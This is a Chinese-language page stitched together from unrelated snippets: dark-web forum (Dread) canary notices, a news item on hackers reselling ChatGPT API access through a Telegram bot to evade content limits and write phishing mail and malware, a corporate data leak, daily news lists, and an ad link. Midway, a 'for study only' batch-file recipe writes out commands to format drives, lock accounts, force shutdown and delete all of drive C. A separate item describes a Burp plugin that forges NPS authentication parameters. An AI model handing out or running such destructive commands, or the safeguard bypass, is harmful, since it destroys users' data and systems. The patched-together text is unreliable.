自Dread论坛管理员1月底称网站有可能在一周内恢复，又已经过去了一个月。转眼已到3月份，“Kirin博客”发现，随着 "Dread"论坛的管理员又陆续更新了网站公告以及私人“金丝雀”（canary），并且其暗网网站状态已经显示绿色的“在线”（online）。 根据Dread暗网网站，在2月11日，其发布公告称： 现在的更新是故意的，由于进一步的问题，因为我试图急于求成，过度简化了打算重写的理论，我们已经留下了一些艰难的决定，这将使重新启动可能不符合我想提供的目标。DoS解决方法的概念正处于最后的测试阶段，只是由于与一些市场管理员的接触有限而被保留，我们希望确保他们的服务能够提供有机流量的可访问性。我目前正在将一些小的新功能/更新迁移到以前的Dread代码库中，我们将在这个时候以最好的能力重新启动。我现在正在避开Reddit，因为那里有大量的投诉和疑虑，这只会给我们所有人带来更多的头痛。我们正在努力工作，很快就会恢复我们所有人的平衡。 2月25日，新的公告称： Dread现在已经在生产服务器上进行了私人测试。暂时邀请了服务管理员和一些Dread版主。我将在Reddit上发布更多有关信息。 2月28日，Dread管理员HugBunter更新金丝雀称依旧活着，并完全控制着Dread网络和相关服务。在Dread中断期间，将继续更新金丝雀专门发布在Dread的网络状态页面。但是如果其洋葱网络不可访问，他将通过/r/DreadAlert在reddit进行紧急更新。 —–BEGIN PGP SIGNED MESSAGE—–Hash: SHA512 I, HugBunter am alive and free as of Tuesday, February 28th, 2023 and in full control of the Dread Network and related services. I have signed this canary for publishing specifically on our network status page during the current outage. Bitcoin block hash:0000000000000000000503b050e7e39453cf479711c5c04df95f672de3300804 Emergency updates are available here or at reddit via /r/DreadAlert if our onion becomes unavailable. Next canary is due Monday, March 6th, 2023.—–BEGIN PGP SIGNATURE—– iQIzBAEBCgAdFiEEYTOs4fS4fFHb8/6l6GEFEPmm6SIFAmP+bmoACgkQ6GEFEPmm6SKxZA/8ClG06+XdJArKKYSWDbpYaFUMRuQZgRmy48oanErwOUHVb1OgRQXDxLZHtdtxSkK8Yg0ndwTpB9ZueP6sLDWSpMP69HflAYT+fd+NAbu0uKmoMNSMIenhlkyGpTwFB9BW/sgEjtDZszUXbRi++5BwonNWyp7XOPtBXaYg9gmjuDZRiSXxjk1rgBmjtPzC1ZUY2rkdU9XPqVX4+XVtzeWrxArQ3C/rhG/WrQD6guAJOXJh5umDAP+LpWk7FPP5BMKU1qlkj/Wbt8o6DfDiHm+8wqAVht3U5HFHJsw8A643s3oP6x7NyTcV8jpc6vyEDtLM89+1qVHWcNUpy8Ky7BTCmrwcDXu1KkA88ayor69FdDkDPxJ5D5bhxf8GoNuerY+VtJ6obK6t5moSIXlWft4pZmRzCD2naF+1SQOjWo+T0i1Vi2An95HEvMXx7IlXYdjAZrNjWWyJdU8a9e4mr8eNxSU61uVc4a4lhT8OwrXMQUZlmO2go5w088crJ4Iq9YlOYkZbTmEhsLjYqEFJnlgd9jlIBCzDUA1in6ASpwH5p3Di+KAzM/l17+d8+NfR6GBTNiyuQZTsY7NK/tQpGxj+F1UhS2V2vBfmzRyzbrOqd8y3V91P6CdQ7RqTzHWkZs7MRZsrvMIU+gnczIorbiYB4LUS1HXaCVqiWZxRi7ztY6M==BWnw—–END PGP SIGNATURE—– 3月1日，Dread管理员Paris也更新金丝雀称还活着，并同样完全控制着Dread网络和相关服务。并称修复了很多东西，“末日游戏V3”（指新版本的Dread）将为所有人到来。 —–BEGIN PGP SIGNED MESSAGE—–Hash: SHA256 I, Paris am alive and free as of Wednesday, Mar 1st, 2023 and in full control of the Dread Network and related services. Patching up many things. Endgame V3 is coming for all. Emergency updates are available here or at reddit via /r/DreadAlert if our onion becomes unavailable. Next canary is due Monday, Mar 6th, 2023. Bitcoin Block: 000000000000000000063dfef2c6b90b6d0689310dff63bcdb30097e79d8063a—–BEGIN PGP SIGNATURE—– iQIzBAEBCAAdFiEEbfleES3oPdbct1q5DE1JcU+sN9gFAmP+61wACgkQDE1JcU+sN9hcgg//eBgQyIGX03NaBGIiwAEU9H0v127pJHGeouJucIscOR+/IAIB2aHSSjULqsSmKtyEc/12TnqKngEjFGGkeWx++FF1AUk0U2V6rLUVSz3lyDDmCStUYHkEB+BB8yY1dUwsk/kWJbmD/f8IwDTEYg+wBDvk7ewziP8QH3aFKj0qgDVvhvUdWZRAYPEFTNySTyJKDQXc81PrIng+c4zw/5MGnbJw0dQo5ifaSO18KJ99Jp/1CPaoRu73lolkVuLNL3SPYo4w6nQgndcQjNl0z7DBp28Gc7hwQenTBTyUtrjnbVmVqLaXOKqiJxPWfBfkGRRUW1QwziculwDGbZaFoyrTk1SE5cpXMGeyOgsulrPEQCKePFZ5XIo7FYkVZ5Pt+E73+Fq7IQb+FKyGH8dF0OSobf2g2RSEv6/zd5Ht9hzhCeuABervo3KPqZVjXPt3sJ0RLtT5E9XRqXzRbLDdGQX1LFVe9iF2sdUcbRXSGYP9WVIKB2YxceH9XGS6+IjZ138UNxEPfq3aJvQ44gSbZme8YByRD9OyPkTG8cnzi9Zy0N/xxvmkz1bRWMz0Fzxs8UlQ1mWQLWZOXN3tNSA4m3EHTS50bYV3Flv+wgDP9c6XcSTJnxBA+XV2DVN4PjA+uw/PxsuRJ/yGuAMQ+YiDsR34dBMvLkOGX+W0SNyyGlDUWi8==xKZj—–END PGP SIGNATURE—– HugBunter与Paris都表示下次将在3月6日更新金丝雀。离Dread论坛真正恢复访问越来越近了。 更多暗网新闻动态，请关注“Kirin博客”。...

黑客靠ChatGPT赚钱：每100次收费37元，还能修改恶意软件代码 现在，黑客已经靠ChatGPT赚钱了——机器人即服务RaaS，前20次免费使用，之后每100次收取5.5美元（约37元）。服务范围主要包括恶意内容的创建，比如写写网络钓鱼邮件、改改恶意软件代码之类。总之，整个过程没有任何OpenAI的限制和障碍，你可以用它来为所欲为。目前OpenAI这边还有任何回复。 “机器人即服务” 据相关安全公司消息，黑客们首先找到一种可以绕过OpenAI限制的方法，通过使用ChatGPT API集成到他们的一个应用程序中。事实上证明，相较于网页端，API版本反而不会对恶意内容进行强制限制。其中有个论坛的用户，就将其与Telegram消息APP结合起来，以此来出售服务Telegram bot。甚至还正儿八经地做了广告。 △图源：Enlarge 前20次查询免费，随后用户每100次查询需要收费5.5美元。安全机构的研究人员测试了这种绕过方法，结果收获了一封钓鱼软件，以及一个病毒脚本，可以从感染计算机中窃取PDF文件，并通过FTP发送给攻击者。 △Telegram bot生成的钓鱼软件，图源：Enlarge △Telegram bot生成的恶意软件，图源：Enlarge（下同）   与此同时，其他黑客也在发布一些可以免费生成恶意内容的代码。 这有个Bash脚本，可帮助绕过ChatGPT限制，做任何你想做的事情。 对于以往的恶意软件代码，比如Infostealer，ChatGPT也可以进行改进。 这也进一步地给了网络犯罪分子可乘之机。黑客与OpenAI斗智斗勇自ChatGPT诞生之日起，就有大量黑客试图将ChatGPT越狱，来生成各种恶意内容。根据访问通道不同，大体有两种方式。一种是Web用户界面，一种是API，将OpenAI的模型和数据跟你自己的应用界面配套使用。比如这些都是合法认证的APP。 此前，黑客们使用Web端ChatGPT生成恶意软件和钓鱼邮件很容易。但随着ChatGPT的监管不断加强。OpenAI的CTO也在最近的采访中提及了监管的重要性。黑客们逐渐开始转战去使用他们的API，结果限制要少得多。对于这件事，有网友表示：没有万无一失的修复方法。因为ChatGPT是一种语言模型，黑客总是可以找到违反OpenAI内容政策的提示。 好了，这场黑客与OpenAI的斗智斗勇，你怎么看呢？ 软件巨头数据库在暗网公布，亚马逊、波音、摩根大通等都受影响 当地时间2月28日消息，美国软件公司Beeline的数据库被攻击者发布在黑客论坛上，数据库内包含亚马逊、瑞士信贷、3M、波音、宝马、戴姆勒、摩根大通、麦当劳、蒙特利尔银行等Beeline客户的数据。 该数据库大约1.5GB，据称是攻击者从Beeline的Jira账户中窃取的。Jira是由Atlassian开发的问题跟踪软件，用于bug跟踪和项目管理活动。与此同时，Beeline运营着一项软件即服务（SaaS）业务，专注于寻找和管理劳动力。 【攻击者在黑客论坛上的发帖】 攻击者声称该数据库包含Beeline的客户数据，例如名字、姓氏、Beeline用户名、职位以及其他数据。黑客论坛的帖子表明，这些数据窃取于2月25日。 记者通过邮件联系Beeline，但截至文章发表前暂未收到回复。 Cybernews研究人员调查了论坛上发布的样本数据，推测泄露的数据包括合法的公司数据。攻击者在论坛帖子中的一些屏幕截图的文件类型是用俄语编写的，这表明攻击者的操作系统默认语言可能是俄语。   超低价ChatGPT账号：http://299r.cn/xmp/?mod=buy&tid=12 ...

3月2日，农历二月十一，星期四 在这里，每天60秒读懂世界！ 1、中国气象局：3月将有3次冷空气过程，冷空气总体减弱，需防范空气污染； 2、中国渤海再发现亿吨级油田：距离天津市约170公里，可开采原油超2000万吨，可供万辆小汽车行驶30年； 3、统计：2月美军53架次侦察机前往南海侦察，相较1月的64架次侦察机有所减少； 4、最高法明确：遭受职场性骚扰有权依法请求精神损害赔偿；工信部：加快布局元宇宙等前沿领域，全面推进6G技术研发； 5、新疆广汇男篮宣布退出CBA。姚明回应：尊重决定，表示遗憾； 6、哈尔滨：取消购车户口区域限制，在本市购买机动车可直接落户上牌； 7、广州：子女3周岁以内，父母每年各享受10日的育儿假，3月1日起施行； 8、河南：3月1日起，调整"住院诊查费"等92个医疗服务价格项目内容，取消"门诊输液费"等68项医疗服务价格项目； 9、韩国抗日独立纪念日当天，尹锡悦发表讲话：日本已从军国主义侵略者转变为合作伙伴； 10、日本死亡人数是新生儿数量两倍，2022年出生人口创百年新低，新生儿跌破80万，岸田文雄表态：情况危急！；岸田文雄：日本今后或"不再完全依赖美国的打击能力"； 11、英媒：英国国王查尔斯三世已决定将哈里夫妇逐出王室小屋，这意味着哈里夫妇将失去他们在英国的唯一住所； 12、国际原子能机构：伊朗一核设施内检测到丰度为83.7%的浓缩铀，已接近武器级丰度；美高官：伊朗约12天可产一枚核弹所需裂变材料，美媒：震惊！； 13、美媒：一列载有3万加仑丙烷的火车在佛罗里达州脱轨，但当地还没有化学品泄漏的报道； 14、俄媒：一架乌克兰制造军用无人机，坠毁于莫斯科州一处天然气压缩机站附近；外媒：乌克兰否认派无人机袭俄领土，乌军或从巴赫穆特河撤军； 15、当地28日，希腊两辆火车相撞，导致车厢脱轨，截至目前，已有38死至少85伤，官员：一司机不知对面有列车驶来。希腊总理宣布全国哀悼三天，外媒：欧盟至今未建立统一铁路网； 【微语】总以为自己还年轻，却忽略了岁月的脚步，当身边的一道道风景变成了回忆，却忽然发现，风景依然在，人已非少年。...

（仅供学习交流，否则后果自负） 上面这一段代码的意思是快速格式化D到Z盘的所有内容。没有则掠过 再回车输入 cd c:\attrib +s +h "windows"attrib +s +h "Program Files"attrib +s +h "Documents and Settings"这段代码是切换到C盘，并且隐藏C盘重要文件，将其设置为系统只读隐藏文件。然后回车输入cd C:\Documents and Settings\Administrator\桌面attrib +S +h上面是隐藏桌面继续回车输入代码net user administrator nisidinglenet user guest nihuile这段代码意思是将计算机的administrator（超级管理员）账户和Guest（来宾账户）设置密码，分别是“你死定了”和“你毁了”的汉语拼音接着回车输入shutdown -r -t 60 -c "敢惹老子！你死定了！"这段代码是设置1分钟关机的，并且会提示：敢惹老子！你死定了也可以把提示换成别的，只要在120个字之内最后回车输入net user administrator /active:no最后这段代码将直接禁用Administrator用户，别人将重启后将无法进入系统然后回车输入 del /f /s /q c:*.*这句命令是删除C盘所有能删除的文件，并且也删除了shutdown和net这两个DOS命令，使对方无法解除关机最后一步把txt文件改成bat文件，只要双击后，你的电脑基本就毁了...

蓝队利器、溯源反制、NPS 漏洞利用、NPS exp、NPS poc、Burp插件、一键利用 最近做攻防演练发现了很多内网穿透的工具，其中最多的就是nps，红队老哥好像还挺喜欢这个的，真的是多，每天导出攻击IP，浅浅扫一下端口，基本都能发现这个nps。贼多  NPS存在一个身份验证的缺陷，无需登录，直接进后台，后台功能点全都可以用。具体利用是伪造两个参数auth_key、timestamp。但是这俩参数的生命周期只有20秒，20秒过后就需要重新伪造，利用的时候，经常失效，还要不停的复制粘贴。非常的操蛋。由于本人长年优雅，最看不得这种事，于是抽时间搞了一个小插件，一键解决所有问题。 使用方法 插件所有的功能集成到了Burp的右键中，首先访问nps站点，拦截请求包。开启插件  下面的这些功能为nps系统中主要的功能点。  点击会修改请求包，之后直接放行数据包。其他的什么都不用管了  每一个请求都会自动贴上身份验证参数，非常的优雅，非常适合优雅且端庄的高级工程师。 ...

3月1日，农历二月初十，星期三 在这里，每天60秒读懂世界！ 1、中国驻多国使馆发布通知：来华不再查核酸，允许以抗原检测(包括用试剂盒自测)代替；韩国：自华入韩旅客落地检阳性率归零，3月1日起免检入境； 2、政协委员甘华田：建议推进6岁以下儿童、80岁以上老年人免费医疗。建议为第三孩提供从幼儿园到高中毕业的免费教育；政协委员周世虹：建议消除对罪犯子女考公的限制；政协委员谢文敏：建议生育登记取消结婚限制；政协委员吕国泉：建议探索放开公务员考试35岁限制； 3、28日早，重庆九龙坡一重型吊车失控驶上人行道，致1名行人死亡7车受损，驾驶员已被控制，初步调查系刹车失灵； 4、安徽当涂县一中学488万招标现3600元插线板，厂家：单价200多可虚报成本。安徽当涂：已成立联合调查组； 5、28日晚，四川甘孜州泸定县发生4.8级地震，震源深度8千米，成都震感微弱；四川：将调整优化成都市落户政策，其他城市和县城全面取消落户限制； 6、义乌楼市新政：安置房面积可换"房票"买商品房，人才购房补助可用于首付款；深圳可售人才房申购条件放宽：单身年龄限制降至30岁； 7、2022年《中国生育成本报告》：全国家庭0-17岁孩子的养育成本平均为48.5万元。0岁至大学本科毕业的养育成本平均为62.7万元； 8、台媒：台当局筹备动员16岁以上学生保乡，战时要投入救护及武器生产，家长老师呼吁不要制造恐慌； 9、朝鲜计划几年内实现农业生产根本变革，外媒：朝正在饥荒边缘徘徊； 10、外媒：截至当地周一收盘，特斯拉收涨5.5%，市值上升超340亿美元(约人民币2362亿元)，马斯克重夺世界首富宝座，其净资产总额为1871亿美元； 11、美媒：美国空军解除了北达科他州核导弹基地2名指挥官及其4名下属军官的职务，但并没说明具体原因； 12、日媒：日本宣布对俄瓦格纳组织等21个团体实施禁运，对作为俄罗斯追加制裁措施； 13、俄方：乌司令部下令炸毁大坝，为阻挡俄军进攻不惜淹没乌平民住宅；俄媒：俄方称美国等西方国家有意在乌进行化武挑衅，同时将此归罪于俄罗斯； 14、俄媒：俄多个广播电台和电视台突然播"导弹袭击警告"，俄官方回应：电台和电视台的服务器遭攻击，其播放的内容"不属实"；俄媒：圣彼得堡普尔科沃机场已恢复正常运营，此前因机场场附近出现"不明飞行物"被关闭； 15、俄媒：普京要求俄联邦安全局有效应对恐怖主义威胁，制止那些企图分裂俄社会的活动；普京签署法律：俄暂停履行《新削减战略武器条约》；克里姆林宫：愿就结束冲突谈判，但坚持对乌东四个地区的主权，新领地已是现实，不会妥协； 【微语】 靠自己才有春暖花开，靠别人最多是昙花一现，所有的自由，都需要实力支撑。...

网站中超链接方式直接添加QQ好友如下： tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=2155890353 上面链接可以进行直接调用qq，进行添加好友。（2155890353是qq号码） 若QQ没有运行会显示     ...